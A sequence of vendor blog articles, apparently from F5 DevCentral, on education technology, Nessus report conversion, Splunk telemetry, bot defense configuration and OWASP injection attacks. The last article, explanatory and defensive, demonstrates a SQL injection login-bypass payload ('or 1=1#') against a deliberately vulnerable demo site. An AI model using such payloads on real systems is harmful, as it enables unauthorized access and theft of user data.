F5 Predicts: Education gets personal
The topic of education is taking centre stage today like never before. I think we can all agree that education has come a long way from the days when students and teachers were confined to a classroom with a chalkboard. Technology now underpins virtually every sector, and education is no exception. The Internet is now the principal enabling mechanism by which students assemble and spread ideas and sow economic opportunities. Education data has become a hot topic in the quest to transform the manner in which students learn. According to Steven Ross, a professor at the Centre for Research and Reform in Education at Johns Hopkins University, the use of data to customise education for students will be the key driver for learning in the future [1]. This technological revolution has resulted in a surge of online learning courses accessible to anyone with a smart device. A two-year assessment of the massive open online courses (MOOCs) created by HarvardX and MITx revealed that there were 1.7 million course entries in the 68 MOOCs [2]. This translates to about 1 million unique participants, who on average engage with 1.7 courses each. This equity of education is undoubtedly providing vast opportunities for students around the globe and improving their access to education. With more than half a million apps to choose from on platforms such as iOS and Android, both teachers and students can obtain digital resources on any subject. As education progresses in the digital era, here are some considerations for educational institutions:

Scale and security

The emergence of a smorgasbord of MOOC providers, such as Coursera and edX, has challenged the traditional, geographical and technological boundaries of education today. Digital learning will continue to grow, driving the demand for seamless and user-friendly learning environments. In addition, technological advancements in education offer new opportunities for government and enterprises. They will be most effective provided these organisations have the ability to rapidly scale and adapt to an all-new digital world – having information services easily available, accessible and secured. Many educational institutions have just as many users as large multinational corporations and face the same issue of scale when delivering applications. The aim now is no longer how to get a fast connection for students, but how quickly content can be provisioned and served and how seamless the user experience can be. No longer can traditional methods provide our customers with the horizontal scaling needed. They require an intelligent and flexible framework to deploy and manage applications and resources. Hence, having an application-centric infrastructure in place to accelerate the roll-out of curriculum to its user base is critical, in addition to securing user access and traffic in the overall environment.

Ensuring connectivity

We live in a Gen-Y world that demands a high level of convenience and speed from practically everyone and anything. This demand for convenience has brought about reform and revolutionised the way education is delivered to students. Furthermore, the Internet of Things (IoT) has introduced a whole new raft of ways in which teachers can educate their students. Whether teaching and learning happens via connected devices such as a Smart Board or an iPad, seamless access to data and content has never been more pertinent than now.
With the increasing reliance on Internet bandwidth, textbooks are no longer the primary means of educating, given that students are becoming more web oriented. The shift helps educational institutes to better personalise the curriculum based on data garnered from students and their work.

Duty of care

As the cloud continues to test and transform the realms of education around the world, educational institutions are opting for a centralised services model, where they can easily select the services they want delivered to students to enhance their learning experience. Hence, educational institutions have a duty of care around the type of content accessed and how it is obtained by students. They can enforce acceptable use policies by only delivering content that is useful to the curriculum, with strong user identification and access policies in place. By securing the application, malware and viruses can be kept out of the institute's environment. From an outbound perspective, educators can be assured that students are only getting the content they are meant to have access to.

F5 has the answer

BIG-IP LTM acts as the bedrock for educational organisations to provision, optimise and deliver their services. It provides the ability to publish applications out to the Internet in a quick and timely manner within a controlled and secured environment. F5 crucially provides both the performance and the horizontal scaling required to meet the highest levels of throughput. At the same time, BIG-IP APM provides schools with the ability to leverage virtual desktop infrastructure (VDI) applications downstream, scale up and down without having to install costly VDI gateways on site, and centralise the security decisions that come with it. As part of this, custom iApps can be developed to rapidly and consistently deliver, as well as reconfigure, the applications that are published out to the Internet in a secure, seamless and manageable way. BIG-IP Application Security Manager (ASM) provides application layer security to protect vital educational assets, as well as the applications and content being continuously published. ASM allows educational institutes to tailor security profiles that fit like a glove and wrap seamlessly around every application. It also gives a level of assurance that all applications are delivered in a secure manner.

Education tomorrow

It is hard not to feel the profound impact that technology has on education. Technology in the digital era has created a new level of personalised learning. The time is ripe for the digitisation of education, but the integrity of the process demands that technology be at the forefront, so as to ensure the security, scalability and delivery of content and data. The equity of education that technology offers helps with addressing factors such as access to education, language, affordability, distance, and equality. Furthermore, it eliminates geographical boundaries by enabling the mass delivery of quality education with the right policies in place.

[1] http://www.wsj.com/articles/SB10001424052702304756104579451241225610478
[2] http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2586847

Nessus 6 XSLT Conversion for ASM Generic Scanner Import
It is important to understand while reading this that I am not an ASM SME... The goal was to create a simple conversion of the Nessus vulnerability scan reports to import into ASM. The first step was figuring out what the scan results needed to look like. So I exported the generic schema from ASM (13.0), which translates to:

<?xml version="1.0" ?>
<scanner_vulnerabilities>
  <vulnerability>
    <attack_type></attack_type>
    <name></name>
    <url></url>
    <parameter></parameter>
    <cookie></cookie>
    <threat></threat>
    <score></score>
    <severity></severity>
    <status></status>
    <opened></opened>
  </vulnerability>
</scanner_vulnerabilities>

That seems pretty simple, but that's a lot of attack types to map to some logic, so for now I will leave it generic. The next step is to get a vulnerability scan of a vulnerable web application. I won't go into how to use Nessus here, but one of the export options is a ".nessus" file, which is just an XML file. There is actually too much data in this file, but you can leave it as is. If you want to read it, you can remove the <Policy> sections, because all we want are the Reports. For this test, I ran a scan against google-gruyere.appspot.com, which is an unsecured app available to the Internet. Don't do this from AWS or someone will come looking for you; ask me how I know...

Example of results:

<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="ASMv2" xmlns:cm="http://www.nessus.org/cm">
    <ReportHost name="google-gruyere.appspot.com">
      <HostProperties>
        <tag name="HOST_END">Tue Aug 29 14:08:04 2017</tag>
        <tag name="LastUnauthenticatedResults">1504015684</tag>
        <tag name="Credentialed_Scan">false</tag>
        <tag name="policy-used">Advanced Scan</tag>
        <tag name="patch-summary-total-cves">16</tag>
        <tag name="cpe">cpe:/o:linux:linux_kernel</tag>
        <tag name="os">linux</tag>
        <tag name="cpe-2">cpe:/o:linux:linux_kernel:2.6</tag>
        <tag name="cpe-1">cpe:/o:linux:linux_kernel:2.4</tag>
        <tag name="cpe-0">cpe:/o:linux:linux_kernel:2.2</tag>
        <tag name="system-type">general-purpose</tag>
        <tag name="operating-system">Linux Kernel 2.2 Linux Kernel 2.4 Linux Kernel 2.6</tag>
        <tag name="traceroute-hop-0">?</tag>
        <tag name="host-ip">172.217.3.212</tag>
        <tag name="host-fqdn">google-gruyere.appspot.com</tag>
        <tag name="HOST_START">Tue Aug 29 13:21:20 2017</tag>
      </HostProperties>
      <ReportItem pluginFamily="CGI abuses" pluginID="39470" pluginName="CGI Generic Tests Timeout" port="443" protocol="tcp" severity="0" svc_name="www">
        <description>Some generic CGI tests ran out of time during the scan. The results may be incomplete.</description>
        <fname>torture_cgi_timeout.nasl</fname>
        <plugin_modification_date>2016/09/21</plugin_modification_date>
        <plugin_name>CGI Generic Tests Timeout</plugin_name>
        <plugin_publication_date>2009/06/19</plugin_publication_date>
        <plugin_type>summary</plugin_type>
        <risk_factor>None</risk_factor>
        <script_version>$Revision: 1.13 $</script_version>
        <solution>Consider increasing the 'maximum run time (minutes)' preference for the 'Web Applications Settings' in order to prevent the CGI scanning from timing out. Less ambitious options could also be used, such as :
        - Test more that one parameter at a time per form : 'Test all combinations of parameters' is much slower than 'Test random pairs of parameters' or 'Test all pairs of parameters (slow)'.
        - 'Stop after one flaw is found per web server (fastest)' under 'Do not stop after the first flaw is found per web page' is quicker than 'Look for all flaws (slowest)'.
        - In the Settings/Advanced menu, try reducing the value for 'Max number of concurrent TCP sessions per host' or 'Max simultaneous checks per host'.</solution>
        <synopsis>Some generic CGI attacks ran out of time.</synopsis>
        <plugin_output>The following tests timed out without finding any flaw :
        - XSS (on HTTP headers)
        - blind SQL injection
        - local file inclusion
        - blind SQL injection (time based)
        - unseen parameters
        - directory traversal (extended test)
        - directory traversal
        - arbitrary command execution
        - SQL injection (on HTTP headers)
        - SQL injection
        </plugin_output>
      </ReportItem>

So far so good... Some of this will be a mess, but we can take a stab at it... So let's mash it all together! How do we tie it all together? There are some tools to help online; I used to have one for Windows but I don't remember what it's called, but I have a Mac now, so...

xsltproc ASM_Nessus.xsl Nessus_Scan.xml > ASM_Import.xml

FYI, for Windows users... https://www.microsoft.com/en-us/download/details.aspx?id=21714

Which gives me a pretty file to import to ASM. It's too big to post as text, but it looks like this:

Alright, so the final test, let's import to ASM... Nice! It could use some work around Attack Type mapping and Parameter mapping, but it looks like it works. Well, that's as far as I got, I hope it helps someone. Now take it and run! The XSLT can be found on GitHub: https://github.com/Mikej81/NessusGenericASMSchema
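For readers who want a rough idea of what such a stylesheet looks like before pulling the full version from GitHub, here is a minimal sketch that maps each Nessus ReportItem into the ASM generic schema shown earlier. The static attack_type and status values, the URL construction, and the field choices are illustrative assumptions on my part, not the published stylesheet:

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="xml" indent="yes"/>
  <!-- Walk every ReportItem in the .nessus file and emit an ASM vulnerability entry -->
  <xsl:template match="/NessusClientData_v2">
    <scanner_vulnerabilities>
      <xsl:for-each select="Report/ReportHost/ReportItem">
        <vulnerability>
          <!-- Attack type mapping is the hard part; default to a generic value for now -->
          <attack_type>Other Application Attacks</attack_type>
          <name><xsl:value-of select="@pluginName"/></name>
          <!-- Nessus reports a host and port rather than a URL, so build one from the host name -->
          <url>https://<xsl:value-of select="../@name"/>:<xsl:value-of select="@port"/>/</url>
          <parameter/>
          <cookie/>
          <threat><xsl:value-of select="risk_factor"/></threat>
          <score><xsl:value-of select="@severity"/></score>
          <severity><xsl:value-of select="@severity"/></severity>
          <status>open</status>
          <opened><xsl:value-of select="../HostProperties/tag[@name='HOST_END']"/></opened>
        </vulnerability>
      </xsl:for-each>
    </scanner_vulnerabilities>
  </xsl:template>
</xsl:stylesheet>

Running a sketch like this through the xsltproc command above produces a file in the generic scanner format, with everything mapped to a single generic attack type until proper mapping logic is added.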
DevCentral Top 5: Sep 8, 2014

But soft! What light through yonder window breaks? It is the east, and this week's edition of the DevCentral Top 5 is the sun. Yep, you guessed it. The top 5 is back...but unlike Shakespeare's Romeo and Juliet, this is no tragedy. Rather, it's a celebration of the most awesome articles you'll read anywhere on the Internet. Our DevCentral authors have been writing with freakish speed and determination, and they have turned out quality articles that are simply second to none. Choosing only five articles was a tough task given all the great content out there, but here's my take on the top articles since our last posting.

F5 SOC Malware Summary Report: Neverquest

I literally could have chosen five Lori MacVittie articles for this "top 5" but I resisted the urge and only chose one. In this article, Lori explains the details of a Trojan known as "Neverquest" that has been active since July 2013. Most of us get that warm, fuzzy, secure feeling when using 2-factor authentication because, you know, it's got 2 factors! Maybe automated malware has a shot at cracking one factor, but two? No way. Well, apparently Neverquest has found a way to automate the demise of our beloved 2FA. Lori does a magnificent job of explaining how Neverquest works, and then she discusses the amazing work that was completed by our F5 Security Operations Center in their analysis of this malware (in case you didn't know, F5 has a Security Operations Center that analyzes malware like this and provides amazing reports that are free for anyone to read). Lori provides links to the downloads of the executive summary as well as the full technical analysis of Neverquest. This one is not optional...if you care about anything at all, you gotta read this one.

Leveraging BIG-IP APM for seamless client NTLM Authentication

Michael Koyfman reminds us why we love the BIG-IP APM...transparent seamless authentication for users. In this article, Michael specifically discusses how to configure the APM to perform client NTLM authentication and use it in the context of sending a SAML assertion to the Office 365 service. This is a step-by-step masterpiece that shows you exactly what to do at every turn. In the end, you point your browser to the FQDN of the APM virtual server and you will be silently authenticated (let's be honest...silent authentication is a bucket-list item for each and every one of us). Michael also reminds us of the SSO options at the end of his article.

Webshells

Nir Zigler introduces us to Webshells (web scripts that act as a control panel for the server running them), and talks about some of the common uses for these scripts. But you know the story...scripts that were created for good can also be used for evil. After Nir explains all the valid uses for legitimate webshells, he takes us to a place where mere mortals dare not tread...through a webshell attack. He gives us an overview of how a webshell attack works, and then he explains some of the specific tools that are used for these nefarious actions. After walking through the power and functionality of an open source webshell called b374k, Nir shows how this tool can be used to attack an unsuspecting user. But have no fear! Nir finishes up the article by discussing the power of the BIG-IP ASM and how it will detect and prevent webshell attacks.

Continuing the DDoS Arms Race

How long have DDoS attacks been around, and why are they still news today? Because they are consistently one of the top attack vectors that companies face today.
Shauntine'z discusses the DDoS arms race and provides some poignant statistics that remind us of the very real and credible DDoS threat. But the article doesn't stop there...it goes on to provide some excellent tips on what to do to strengthen your DDoS defense posture (it even has a well-placed picture of Professor John Frink...you gotta check this one out). Last, Shauntine'z reveals new features that are loaded in the latest release of the BIG-IP...version 11.6. The AFM and ASM have some new and exciting capabilities that are "must haves" for any company that is serious about securing their applications and critical business functions.

(Editor's note: the LineRate product has been discontinued for several years. 09/2023)

Why ECC and PFS Matter: SSL offloading with LineRate

We all know that sensitive data traverses our networks every day. We also know it's critically important to secure this information. We also know that SSL/TLS is the primary method used to secure said information. Andrew Ragone discusses SSL offloading and tells us why Elliptical Curve Cryptography (ECC) and Perfect Forward Secrecy (PFS) are great candidates for securing your information. He highlights the advantages of the software-based LineRate solution, and gives great examples of why LineRate is the clear-cut winner over any existing software-based or hardware-based SSL/TLS offload solutions. Andrew also published another series of articles related to this very topic, and in these articles he walks you through the exact steps needed to configure SSL certificates and offload SSL on LineRate. On that subject...if you haven't had a chance to check out LineRate and learn all about the awesomeness that it is, do yourself a favor and visit.

How I did it - "Visualizing Data with F5 TS and Splunk"
The new Splunk Add-on for F5 BIG-IP includes several objects (modular inputs, CIM knowledge, etc.) that work to "normalize" incoming BIG-IP data for use with other Splunk apps, such as Splunk Enterprise Security and the Splunk App for PCI Compliance. The add-on includes a mechanism for pulling network traffic data, system logs, system settings, performance metrics, and traffic statistics from the F5 BIG-IP platform using F5's iControl API (see below). But what I'm really excited about is that the add-on now integrates with F5 Telemetry Streaming (TS). With TS I am easily able to declaratively aggregate, normalize, and push BIG-IP statistics and events (JSON-formatted) to a variety of third-party analytics vendors. For the remainder of this article, we'll take a look at how I integrate F5 TS with Splunk Enterprise. I'll be working with an existing BIG-IP deployment as well as a newly deployed Splunk Enterprise instance. As an added bonus (and since it's part of the article's title), I'll import a couple of custom dashboards (see below) to visualize our newly ingested telemetry data. Oh! As an "extra" added bonus, here is a link to a video walkthrough of this solution.

Installing the Splunk Add-on for F5 BIG-IP and Splunk CIM

Installing the Splunk F5 add-on is very simple. Additionally, to make use of the add-on I'll need to install Splunk's Common Information Model (CIM).

1. From the top of the Splunk search page, I select 'Apps' → 'Find More Apps'.
2. I browse for "CIM" and select the Splunk Common Information Model add-on.
3. I accept the license agreement, provide my Splunk account login credentials and select 'Login and Install'.
4. I'll repeat steps 2-3 to install the Splunk Add-on for F5 BIG-IP.

Setup Splunk HTTP Event Collector

To receive incoming telemetry data into my Splunk Enterprise environment over HTTP/HTTPS I will need to create an HTTP Event Collector.

1. From the UI I select 'Settings' → 'Data Inputs'. I select 'HTTP Event Collector' from the input list.
2. Prior to creating a new event collector token, I must first enable token access for my Splunk environment. On the 'HTTP Event Collector' page, I select 'Global Settings'. I set 'All Tokens' to enabled, set the default index and incoming port, and ensure SSL is enabled. I click 'Save' to exit.
3. I select 'New Token', provide a name for the new collector and select 'Next'.
4. On the 'Input Settings' tab I'll select my allowed index(es) and select 'Review' then 'Submit'.
5. Once the token is created, I will need to copy the token for use with my F5 TS configuration.

Configure Telemetry Streaming

With my Splunk environment ready to receive telemetry data, I now turn my attention to configuring the BIG-IP for telemetry streaming. Fortunately, with F5's Automation Toolchain, configuring the BIG-IP is quite simple.

1. I'll use Postman to POST an AS3 declaration to configure telemetry resources (telemetry listener, log publisher, logging profiles, etc.). The above AS3 declaration (available here) deploys the required BIG-IP objects for pushing event data to a third-party vendor. Notably, it creates four (4) logging profiles I'll attach to my application's virtual server.
2. Still using Postman, I POST my TS declaration (sample); a minimal example is also included at the end of this article. I will need to provide my Splunk HTTP Collector endpoint address/port as well as the token generated previously.

Associate Logging Profiles to Virtual Server

The final step to configuring the BIG-IP for telemetry streaming is associating the logging profiles I just created with my existing virtual server.
In addition to system telemetry, these logging profiles, when assigned to a virtual, will send LTM, AVR, and ASM telemetry.

1. From the BIG-IP management UI, I select 'Local Traffic' → 'Virtual Servers' → <virtual>.
2. Under 'Configuration' I select 'Advanced', scroll down and select the HTTP, TCP, and request logging profiles previously created. I select 'Update' at the bottom of the page to save.
3. From the top of the virtual server page, I select 'Security' → 'Policies'. From the policy settings page, I can see that there is an existing WAF policy associated with my application. To enable ASM logging, I select the previously created ASM logging profile from the available logging profiles and select 'Update' to save my changes.

With the configuration process complete, I should now start seeing event data in my Splunk environment.

Import Dashboards

"Ok, so I have event data streaming into my Splunk environment; now what?" Since I have installed the Splunk F5 add-on, I can integrate my "normalized" data with other data sources to populate various Splunk applications like Splunk Enterprise Security and the Splunk App for PCI Compliance. Likewise, I can use dashboards to visualize my telemetry data as well as monitor BIG-IP resources/processes. To finish up, I'll use the following steps to create custom dashboards visualizing BIG-IP metrics and Advanced WAF (formerly ASM) attack information.

1. From the Splunk Search page, I navigate to the Dashboards page by selecting 'Dashboards'.
2. Select 'Create New Dashboard' from the Dashboards page.
3. Provide a name for the new dashboard and select 'Create Dashboard'. The dashboard name (the ID will remain unchanged) will be updated in the next step, where I replace the newly created dashboard's XML source with one of the community-supported dashboard XML files here.
4. On the 'Edit Dashboard' screen I select 'Source' to edit the dashboard XML. I replace the existing XML data with the contents of the 'advWafInsights.xml' file. Select 'Save' to install the new dashboard.
5. I'll repeat steps 1-4 using 'bigipSystemMetrics.xml' to install the BIG-IP metrics dashboard.

Additional Links

· F5 Telemetry Streaming
· Splunk Add-on for F5 BIG-IP
· Splunk Common Information Model
· F5 Automation Toolchain
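For reference, the TS declaration POSTed in the 'Configure Telemetry Streaming' step above is a small JSON document. A minimal sketch with a Splunk consumer might look like the following; the host address is a placeholder, the passphrase is the HEC token created earlier, and property values should be checked against the Telemetry Streaming documentation for your TS version:

{
    "class": "Telemetry",
    "My_System": {
        "class": "Telemetry_System",
        "systemPoller": {
            "interval": 60
        }
    },
    "My_Listener": {
        "class": "Telemetry_Listener",
        "port": 6514
    },
    "My_Consumer": {
        "class": "Telemetry_Consumer",
        "type": "Splunk",
        "host": "192.0.2.10",
        "protocol": "https",
        "port": 8088,
        "passphrase": {
            "cipherText": "<HEC-token-from-Splunk>"
        }
    }
}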
Configuring Unified Bot Defense with BIG-IQ Centralized Management

While estimates vary, it is believed that more than half of Internet traffic is generated by bots, of which unwanted or malicious ones (like spam or malware bots) account for more than half, the remainder being generated by "good" bots (like crawlers or feed fetcher bots). It is therefore important to differentiate between different classes of bots and treat them according to site-specific security policies. The Unified Bot Defense profiles, first released in TMOS version 14.1, package bot protection features like Bot Signatures and Proactive Bot Defense, previously found in L7 DoS profiles, and Web Scraping protection, previously found in ASM policies. Configuring Unified Bot Defense profiles through BIG-IQ ensures configuration consistency across the centrally managed BIG-IP estate and enhanced reporting capabilities. This article will guide you through the configuration of Unified Bot Defense profiles using the BIG-IQ CM user interface. It is assumed that the BIG-IP device where the Bot Defense profile will be deployed is currently managed by the BIG-IQ cluster, at least one BIG-IQ Logging Node / Data Collection Device is available, and the Virtual Server to be protected is already configured (in the example below, VS_12BOX); the configuration of these elements will not be part of this article.

This article covers:
- configuring the Shared Security / Application Security Event Logging Profile
- configuring the Bot Defense profile
- monitoring the Bot Defense profiles

Configuration of the Security Log Profile

1. Go to Configuration->LOCAL TRAFFIC->Pools, click Create and fill in the settings:
- Name: Pool_DCD
- Device: select the BIG-IP device
- Health monitors: gateway_icmp
- New member:
  - Select "New Node"
  - Address: Type the Logging Node / DCD IP address
  - Port: 8514 (this is the port that the Web Application Security Service listens on on the Logging Node / DCD)
Note: Ensure that the Logging Node / Data Collection Device has the Web Application Security Service activated and the managed BIG-IP has LTM, SSM and ASM services Discovered/Imported.

2. Go to Configuration->LOCAL TRAFFIC->Logs->Log Destination, click Create and fill in the settings:
- Name: Log_dst_HSL_DCD
- Type: Remote High-Speed
- Device: select the BIG-IP device
- Pool: select /Common/Pool_DCD

3. Go to Configuration->LOCAL TRAFFIC->Logs->Log Destination, click Create and fill in the settings:
- Name: Log_dst_Splunk_DCD
- Type: SPLUNK
- Forward to: select /Common/Log_dst_HSL_DCD

4. Go to Configuration->LOCAL TRAFFIC->Logs->Log Publishers, click Create and fill in the settings:
- Name: Log_pub_DCD
- Log destinations: select /Common/Log_dst_Splunk_DCD

5. Go to Configuration->LOCAL TRAFFIC->Pinning Policies and select the BIG-IP device
- Filter the available Local Traffic Manager (LTM) objects by selecting Log Publishers from the dropdown menu
- Check Log_pub_DCD and click the Add Selected button

6. Go to Configuration->SECURITY->Shared Security->Logging Profiles, click Create and fill in the settings:
- Name: Log_bot_protect_demo
- Bot Defense:
  - Status: Enabled
  - Local Publisher: Enabled
  - Remote Publisher: /Common/Log_pub_DCD

Attach the Log_bot_protect_demo log profile to the protected Virtual Server (in this example, the VS_12BOX VS)

1. Go to Configuration->SECURITY->Shared Security->Virtual Servers and click on the VS_12BOX VS
2. Select the Log_bot_protect_demo log profile for Logging Profiles

Deploy the configuration to the BIG-IP

1. Go to Deployment->EVALUATE & DEPLOY->Local Traffic & Network, create a new Deployment.
Once the evaluation has finished, click on Deploy.

2. Go to Deployment->EVALUATE & DEPLOY->Shared Security, create a new Deployment. Once the evaluation has finished, click on Deploy.

Configuration of the Bot Defense Profile

Go to Configuration->SECURITY->Shared Security->Bot Defense->Bot Profiles, click Create and fill in the settings:
- Name: bot_defense_demo
- Enforcement Mode: Blocking
- Profile Template: Strict
- Browser Verification:
  - Browser Access: Allowed
  - Browser Verification: Verify After Access (Blocking)

Note: As per K42323285: Overview of the unified Bot Defense profile, the available options for the configuration elements used in this example are:

Enforcement Mode: Select one of the following modes, depending on the readiness of your application environment and requirements:
- Transparent—The system logs traffic mitigation and verification actions, according to your logging profile settings, but does not provide the following:
  - JavaScript-based verification.
  - Device ID collection.
  - CAPTCHA challenge.
- Blocking—The system performs traffic mitigation and verification, and logs them according to your logging profile settings.

Profile Template: The template you select determines the default values for mitigation and verification settings. However, you can customize these settings to meet your application security requirements. After the system saves the profile, you can't change this setting. The following list contains descriptions of the available templates:
- Relaxed—Performs basic verification of browsers and blocks malicious bots based on bot signatures.
- Balanced—This is the default selection. Performs advanced verification of browsers, including:
  - CAPTCHA challenges for suspicious browsers.
  - Anomaly detection algorithms and bot signatures to detect and block malicious bots.
  - Limiting the total request rate for unknown bots.
- Strict—This is the strictest policy; it has settings that:
  - Only allow browsers access if they pass proactive verification.
  - Block all bots except trusted ones.

Browser Verification: Specifies what and when the system sends challenges.
- None—The system does not perform JavaScript and header-based verification. However, some anomaly detection (such as Session Opening) still occurs.
- Challenge-Free Verification—The default value when Profile Template is set to Relaxed. The system performs header-based verification but does not perform JavaScript verification.
- Verify Before Access—The default value when Profile Template is set to Strict. The system sends a white page with JavaScript to challenge the client. If the client fails the challenge, the system performs the configured mitigation action and reports the anomaly. If the client passes the challenge, the system forwards the request to the server.
- Verify After Access (Blocking)—The default value when Profile Template is set to Balanced. The system injects a JavaScript challenge in the server response prior to sending the response to the client. If the client fails the challenge, the system performs the configured mitigation action and reports the anomaly. If the client passes the challenge, the system forwards the request to the server.
- Verify After Access (Detection Only)—The system injects a JavaScript challenge in the server response prior to sending the response to the client. If the client fails the challenge, the system only reports the anomaly but does not perform any mitigation action. If the client passes the challenge, the system forwards the request to the server.
Device ID Mode: A unique identifier that BIG-IP ASM creates by sending JavaScript to get information about the client device. The default value for this setting is determined by your selection in Profile Template (under General Settings). F5 recommends you use the default values set by the Profile Template you selected unless you have specific application requirements.
- None—The default value when Profile Template is set to Relaxed. The system does not send JavaScript to collect the device ID.
- Generate After Access—The default value when Profile Template is set to Balanced. The system injects the JavaScript in the server response before forwarding it to the client. This is less intrusive and has less of a latency impact.
- Generate Before Access—The default value when Profile Template is set to Strict. The system sends the JavaScript challenge to the client before forwarding the client request to the server. This guarantees that every request that reaches the server has a device ID. This has more of a latency impact compared to the previous option. The system blocks bots that attempt to present themselves as browsers but are unable to execute the JavaScript challenge.

Attach the bot_defense_demo bot protection profile to the VS_12BOX VS

1. Go to Configuration->SECURITY->Shared Security->Virtual Servers and click on the VS_12BOX VS
2. Select the bot_defense_demo profile for Bot Defense profile

Deploy the Bot Defense profile to the BIG-IP

Go to Deployment->EVALUATE & DEPLOY->Shared Security, create a new Deployment. Once the evaluation has finished, click on Deploy.

Monitoring Bot Defense Profiles

To monitor Bot Protection operation, check the Monitoring->DASHBOARDS->Bot Traffic Dashboard and the Monitoring->EVENTS->Bot->Bot requests logs.
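As an additional sanity check (not part of the original walkthrough), you can send a request to the protected virtual server from a non-browser client such as curl. Because a command-line client cannot execute the JavaScript challenge required by the Strict template in Blocking mode, it should not receive the normal application response, and the attempt should appear in the Bot requests log; the address below is a placeholder for your own virtual server:

$ curl -sk -o /dev/null -w "%{http_code}\n" https://<VS_12BOX-address>/

A normal browser, which can answer the challenge, should still reach the application as usual.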
OWASP Mitigation Strategies Part 1: Injection Attacks

The OWASP organization lists "injection" attacks as the number one security flaw on the Internet today. In fact, injection attacks have made the OWASP top ten list for the past 13 years and have been listed as the number one attack for the past 9 years. Needless to say, these attacks are serious business and should be guarded against very carefully. Every web application environment allows the execution of external commands such as system calls, shell commands, and SQL requests. What's more, almost all external calls can be attacked if the web application is not properly coded. In the general sense of the word, an injection attack is one whereby malicious code is "injected" into one of these external calls. These attacks are typically used against SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers; SMTP headers; program arguments; etc. When a web application passes information from an HTTP request to an external system, it must be carefully scrubbed. Otherwise, the attacker can inject malicious commands into the request and the web application will blindly pass these on to the external system for execution. One of the most common types of injection attacks is a SQL injection. Many web applications utilize a backend database to store critical information like usernames, passwords, credit card numbers, personal information (address/phone number), etc. When you login to a website, you present your authentication credentials (i.e. username/password), and something on that backend has to validate that you are the correct user. There's a database back there somewhere holding all that information. In effect, what has happened is that the website you are logging into sent an external command to a backend database and used the credentials you provided in the HTTP request to validate you against the stored database information. Along the way somewhere, some malevolent peeps had some crazy thoughts that went something like this: "hey, if my HTTP request is going to ultimately populate a SQL database command, maybe I could supply some crazy info in that HTTP request so that the SQL command ends up doing some really wild things to that backend database!!" That's the idea behind the SQL injection attack. SQL commands are used to manipulate database information. You can add, delete, edit, display, etc. any information in the database. Like any other system commands, these can be very helpful or very dangerous...it just depends on how they are used. Of course, these commands need to be locked down so that only trusted administrators can use them when running queries on the database. But imagine a web application that wasn't built correctly and allows SQL commands to be passed from the HTTP request to the backend database with no error checking at all. That would be a ripe web application for an injection attack!

SQL Injection Attack

The screenshot below shows a web application for an online auction site called "Hack-it-yourself auction". This is a fictitious site that was purposely built with bad coding techniques and tons of vulnerabilities. It provides a great testing venue for things like injection attacks. It also showcases the power of a Web Application Firewall (WAF) and the protection it can provide even when your web application is totally vulnerable like this one. Notice in the screenshot that a user can login to the auction site via the "username" and "password" fields on the right side of the page.
When a user submits login information on the website, the HTTP request takes the values from the "username" and "password" fields and uses them to formulate a SQL command to validate the user against the backend database that stores all the user information (name, address, credit card number, etc). The SQL command is designed to look something like this:

SELECT id FROM users WHERE username = "username" and password = "password"

This SQL command grabs the values for "username" and "password" that the user typed into each of those fields. If the username and password are correct, then the user is validated and the web application will allow the user's information to be displayed. A SQL injection takes advantage of the fact that the HTTP request values are used to build the SQL command. An attacker could replace the "username" info with an interesting string of characters that don't look very normal to the casual observer but are still understood by the backend database. Check out the screenshot below to see the unique SQL injection username. In this example, the username is ' or 1=1# and that will result in the SQL statement looking something like this:

SELECT id FROM users WHERE username = '' or 1=1# and password = '".md5($MD5_PREFIX.$password)."'

Essentially, this statement is asking the database to select all records in the users table. It takes advantage of the fact that the web application is not validating user inputs: it uses the "or" expression on the username and then states a fact (in this case, 1=1) so that the database will accept it as a true statement. It also uses some creative MD5 hash techniques to access the password. Notice the username in the screenshot below: Apparently this SQL injection worked, because now I am logged in as user ' or 1=1#. Not your typical, everyday username! So, the authentication was allowed to happen and the database is now ready to serve up any and all records that are located in the users table. I wonder what kind of goodness we can find there? Notice the "Your control panel" link on the page...that link takes you to the information stored for each user in the database. The database is ready to serve up ALL the records in the users table, so let's click on that "Control Panel" link and see what kind of goodies we can find. Check out the screenshot below and notice in the address bar a familiar-looking username at the end of the URL: Clearly we have some serious issues here. At this point, the attacker has all the names, credit card numbers, emails, phone numbers, and addresses of every single user of this auction site. The attacker could simply copy all this information and use it later, or he could manipulate it using other SQL commands, or he could delete it all...the possibilities are seemingly endless. Think about some of the recent data breaches you've read about (or experienced) that have disclosed sensitive information...some of them happened because of a situation very similar to what I've just shown above. The correct answer for this problem is to fix the code that was used to develop this web application. Obviously, this specific code doesn't check for valid usernames...it will pass along anything you put in that field. OWASP has a list of proactive controls that are great techniques to help prevent exploitation of one or more of the OWASP top ten vulnerabilities. For injection attacks specifically, code developers should do things like parameterize queries, encode data, and validate inputs.
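As an illustration of the first of those controls (a sketch only, not the actual auction-site code), a parameterized query keeps the user-supplied values out of the SQL grammar entirely, so a username like ' or 1=1# no longer changes the meaning of the statement:

<?php
// Hypothetical login check using PDO prepared statements; $pdo, $MD5_PREFIX,
// $username and $password are assumed to be provided by the application.
$stmt = $pdo->prepare('SELECT id FROM users WHERE username = :username AND password = :password');
$stmt->execute([
    ':username' => $username,
    ':password' => md5($MD5_PREFIX . $password) // mirrors the hash scheme in the example above
]);
$user = $stmt->fetch();
if ($user === false) {
    // authentication failed
}
?>

Because the values are bound as data rather than concatenated into the statement, the database never interprets them as SQL.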
Ideally, code developers will write phenomenal code and you won't ever have to worry about these vulnerabilities. And, in recent years, developers have done a great job of using secure coding practices to do just that. However, not all developers are perfect, and some of the code we use today is very old and hard to change...it's also full of security vulnerabilities that allow for things like SQL injections.

Web Application Firewall Mitigation

